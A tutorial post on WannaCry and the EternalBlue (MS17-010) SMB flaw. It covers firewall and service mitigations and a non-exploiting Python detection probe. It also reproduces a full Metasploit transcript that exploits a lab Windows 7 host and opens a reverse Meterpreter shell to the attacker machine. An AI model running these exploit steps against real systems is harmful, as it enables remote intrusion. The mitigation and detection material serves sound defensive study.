Which vulnerability did WannaCry mainly exploit?


Background and vulnerability overview

Once a host has been compromised by this ransomware, a ransom dialog pops up stating the demand and asking the user to pay in Bitcoin. The important files on the host, such as photos, images, documents, archives, audio, video and executables, almost every file type, are encrypted and have the extension ".WNCRY" appended. The security industry had no effective way to undo the malicious encryption: once a host was compromised, the ransomware itself was removed by reinstalling the operating system, but the user's data files could not be recovered directly.


Vulnerability exploited:

On 12 May 2017 the WannaCry worm broke out worldwide through the MS17-010 vulnerability and infected a large number of computers. After infecting a machine, the worm plants a ransomware (extortion) payload that encrypts large numbers of files on it.

WannaCry spreads by exploiting a vulnerability in the Windows SMBv1 service, which listens on TCP port 445; it copies itself and propagates on its own, with no user interaction required.

Note that "EternalBlue" (永恒之蓝) is the name of the leaked NSA exploit tool, not the name of the malware. EternalBlue is the exploit for the vulnerability fixed by MS17-010 (CVE-2017-0144), which Microsoft patched in March 2017 and which the Shadow Brokers leaked in April 2017. The WannaCry ransomware uses it to propagate, and other malware can spread through the same vulnerability, so patching the system is essential.

Demonstrating the EternalBlue vulnerability, i.e. MS17-010 (the full msfconsole transcript is reproduced after the mitigation section):

1. Target IP address

The target is a Windows 7 SP1 x64 host at 172.16.35.139; the attacker machine is 172.16.35.136.

2. Exploit with msf

(1) Search for the EternalBlue exploit (search eternal)

(2) Set the addresses (set lhost / set rhosts)

(3) Run the exploit (exploit)

(4) Exploit succeeded: a Meterpreter session opens on the target, and sysinfo / ipconfig confirm the host

Mitigations:

Procedure for Windows 7, 8 and 10

1. Open Control Panel > System and Security > Windows Firewall, and click "Turn Windows Firewall on or off" in the left pane.

2. Select "Turn on Windows Firewall" and click OK.

3. Click "Advanced settings".

4. Click "Inbound Rules", then "New Rule".

5. Select "Port", then Next.

6. Select "Specific local ports", enter 445, then Next.

7. Select "Block the connection", then Next.

8. Under Profile, tick all three (Domain, Private, Public), then Next.

9. Enter any name and click Finish.

This rule keeps the worm from reaching the SMB service, but it also blocks legitimate inbound file and printer sharing to the host and does nothing about the vulnerable code itself. It is a stopgap: the lasting fix is installing the MS17-010 security update, and disabling SMBv1 wherever nothing depends on it.

Procedure for Windows XP

1. Open Control Panel > Security Center > Windows Firewall and select "On".

2. Click Start > Run, type cmd, click OK, and run these three commands: net stop rdr, net stop srv, net stop netbt

These stop the SMB redirector (client), the SMB server and NetBIOS over TCP/IP, which also disables file sharing, and they only last until the next reboot, so they must be repeated or the services set to disabled. After the outbreak Microsoft also released an emergency MS17-010 update for Windows XP, which is the lasting fix.

Full msfconsole transcript of the demonstration (steps (1) to (4) above):

msf6 exploit(windows/browser/ms11_050_mshtml_cobjectelement) > search eternal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   2  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   3  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   4  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce                                                                                                                            

msf6 exploit(windows/browser/ms11_050_mshtml_cobjectelement) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file w
                                             ith syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.35.137    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 172.16.35.136
lhost => 172.16.35.136
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.35.139
rhosts => 172.16.35.139
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 172.16.35.136:4444
[*] 172.16.35.139:445 - Executing automatic check (disable AutoCheck to override)
[*] 172.16.35.139:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.35.139:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.35.139:445     - Scanned 1 of 1 hosts (100% complete)
[+] 172.16.35.139:445 - The target is vulnerable.
[*] 172.16.35.139:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.35.139:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.35.139:445     - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.35.139:445 - Connecting to target for exploitation.
[+] 172.16.35.139:445 - Connection established for exploitation.
[+] 172.16.35.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.35.139:445 - CORE raw buffer dump (38 bytes)
[*] 172.16.35.139:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 172.16.35.139:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 172.16.35.139:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1         
[+] 172.16.35.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.35.139:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.35.139:445 - Sending all but last fragment of exploit packet
[*] 172.16.35.139:445 - Starting non-paged pool grooming
[+] 172.16.35.139:445 - Sending SMBv2 buffers
[+] 172.16.35.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.35.139:445 - Sending final SMBv2 buffers.
[*] 172.16.35.139:445 - Sending last fragment of exploit packet!
[*] 172.16.35.139:445 - Receiving response from exploit packet
[+] 172.16.35.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.35.139:445 - Sending egg to corrupted connection.
[*] 172.16.35.139:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 172.16.35.139
[*] Meterpreter session 1 opened (172.16.35.136:4444 -> 172.16.35.139:49159) at 2022-07-21 21:26:30 +0800
[+] 172.16.35.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.35.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.35.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > sysinfo
Computer        : WIN-50HM5UIKP60
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:78:c7:d1
MTU          : 1500
IPv4 Address : 172.16.35.139
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::2c4d:f99f:5511:8da8
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:ac10:238b
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
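The AutoCheck in the transcript above (auxiliary/scanner/smb/smb_ms17_010) decides "likely VULNERABLE" from a single SMB status code, and the same probe is how a defender verifies that the mitigations in the previous section actually took effect. The script below is an added example, written for this page and not taken from the original post or from Metasploit, that reimplements that probe over a raw socket: negotiate SMBv1 (NT LM 0.12), open an anonymous null session, connect to IPC$, then send an SMB_COM_TRANSACTION with the TRANS_PEEK_NMPIPE subcommand against FID 0 and read the NT status. An unpatched srv.sys answers STATUS_INSUFFICIENT_RESOURCES (0xC0000205); patched hosts answer STATUS_INVALID_HANDLE (0xC0000008) or, on Windows 10, STATUS_ACCESS_DENIED (0xC0000022). Nothing is exploited. The packet layouts follow MS-CIFS; MaxBufferSize, the PID, the NativeOS/LanMan strings and the constructed_reply helper are arbitrary choices of this example, and the default target 172.16.35.139 is the lab host from the transcript.

```python
"""MS17-010 pre-check over a raw socket (added example; not code from the post or Metasploit).
Same probe as auxiliary/scanner/smb/smb_ms17_010: SMBv1 negotiate, null session, tree connect
to IPC$, then SMB_COM_TRANSACTION / TRANS_PEEK_NMPIPE on FID 0 and read the NT status."""
import socket
import struct
import sys

def nb_frame(smb: bytes) -> bytes:
    """Prefix the 4-byte NetBIOS session header: type 0, 3-byte big-endian length."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb

def smb_header(cmd: int, tid: int = 0, uid: int = 0, mid: int = 1) -> bytes:
    """32-byte SMBv1 header; flags2 0x4001 = NT status codes + long names, no Unicode."""
    return b"\xffSMB" + struct.pack("<BIBHH8sHHHHH", cmd, 0, 0x18, 0x4001, 0,
                                    b"\x00" * 8, 0, tid, 0xFEFF, uid, mid)

def negotiate() -> bytes:
    """SMB_COM_NEGOTIATE (0x72) offering only the NT LM 0.12 dialect."""
    dialect = b"\x02NT LM 0.12\x00"
    return smb_header(0x72) + b"\x00" + struct.pack("<H", len(dialect)) + dialect

def session_setup_anonymous() -> bytes:
    """SMB_COM_SESSION_SETUP_ANDX (0x73): zero-length passwords + empty account = null session.
    MaxBufferSize 4356, MaxMpx 2, capabilities NT_SMBS|STATUS32 and the OS strings are arbitrary."""
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 4356, 2, 0, 0, 0, 0, 0, 0x50)
    data = b"\x00\x00Unix\x00python\x00"  # account, domain, NativeOS, NativeLanMan
    return smb_header(0x73) + b"\x0d" + words + struct.pack("<H", len(data)) + data

def tree_connect_ipc(host: str, uid: int) -> bytes:
    """SMB_COM_TREE_CONNECT_ANDX (0x75) to \\\\host\\IPC$ with a one-byte empty password."""
    data = b"\x00" + f"\\\\{host}\\IPC$".encode() + b"\x00?????\x00"
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)  # AndX none, flags 0, PasswordLength 1
    return smb_header(0x75, uid=uid) + b"\x04" + words + struct.pack("<H", len(data)) + data

def peek_named_pipe_probe(tid: int, uid: int) -> bytes:
    """SMB_COM_TRANSACTION (0x25): Setup = [TRANS_PEEK_NMPIPE 0x23, FID 0], name \\PIPE\\."""
    name = b"\\PIPE\\\x00"
    setup = struct.pack("<HH", 0x23, 0)
    end = 32 + 1 + 32 + 2 + len(name)  # where the (empty) parameter and data areas start
    words = struct.pack("<HHHHBBHIHHHHHBB", 0, 0, 0xFFFF, 0xFFFF, 0, 0, 0, 0, 0,
                        0, end, 0, end, 2, 0) + setup
    return (smb_header(0x25, tid=tid, uid=uid) + b"\x10" + words
            + struct.pack("<H", len(name)) + name)

def parse_header(reply: bytes) -> dict:
    """Extract command, NT status, TID, UID and MID from a reply (NetBIOS prefix optional)."""
    if reply[:4] != b"\xffSMB":
        reply = reply[4:]
    if reply[:4] != b"\xffSMB":
        raise ValueError("not an SMBv1 reply")
    cmd, status = struct.unpack_from("<BI", reply, 4)
    tid, _pid, uid, mid = struct.unpack_from("<HHHH", reply, 24)
    return {"cmd": cmd, "status": status, "tid": tid, "uid": uid, "mid": mid}

def classify(status: int) -> str:
    """Verdict the Metasploit scanner prints for the PeekNamedPipe status."""
    if status == 0xC0000205:                # STATUS_INSUFFICIENT_RESOURCES: unpatched srv.sys
        return "VULNERABLE"
    if status in (0xC0000008, 0xC0000022):  # STATUS_INVALID_HANDLE / STATUS_ACCESS_DENIED (Win10)
        return "PATCHED"
    return "UNKNOWN"

def constructed_reply(status: int, tid: int = 0, uid: int = 0) -> bytes:
    """Constructed sample reply for offline testing: a framed header carrying `status`."""
    hdr = bytearray(smb_header(0x25, tid=tid, uid=uid))
    struct.pack_into("<I", hdr, 5, status)
    return nb_frame(bytes(hdr) + b"\x00\x00\x00")  # WordCount 0, ByteCount 0

def recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf

def exchange(sock: socket.socket, pkt: bytes) -> dict:
    sock.sendall(nb_frame(pkt))  # one framed request, exactly one framed reply
    return parse_header(recv_exact(sock, int.from_bytes(recv_exact(sock, 4)[1:], "big")))

def check_host(host: str, port: int = 445, timeout: float = 5.0) -> str:
    """Run the probe against one host; returns VULNERABLE, PATCHED or UNKNOWN."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if exchange(s, negotiate())["status"] != 0:
            return "UNKNOWN"  # SMBv1 refused (e.g. SMB1 disabled): not conclusive
        sess = exchange(s, session_setup_anonymous())
        if sess["status"] != 0:
            return "UNKNOWN"  # null session refused: not conclusive
        tree = exchange(s, tree_connect_ipc(host, sess["uid"]))
        if tree["status"] != 0:
            return "UNKNOWN"
        return classify(exchange(s, peek_named_pipe_probe(tree["tid"], sess["uid"]))["status"])

if __name__ == "__main__":
    for target in sys.argv[1:] or ["172.16.35.139"]:  # default: the lab target from the transcript
        try:
            print(target, check_host(target))
        except OSError as exc:
            print(target, "UNREACHABLE", exc)
```

Run it as python3 ms17_010_check.py <host> against hosts you own. On the transcript's Windows 7 SP1 target it reports VULNERABLE; after the MS17-010 update is installed it reports PATCHED; with the inbound port-445 block rule from the mitigation section in place the connection times out and it reports UNREACHABLE. UNKNOWN means the host refused SMBv1, the null session or the IPC$ tree connect, which usually closes this exploit path but is not proof of patching; use the Metasploit module with SMBUser/SMBPass in that case.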
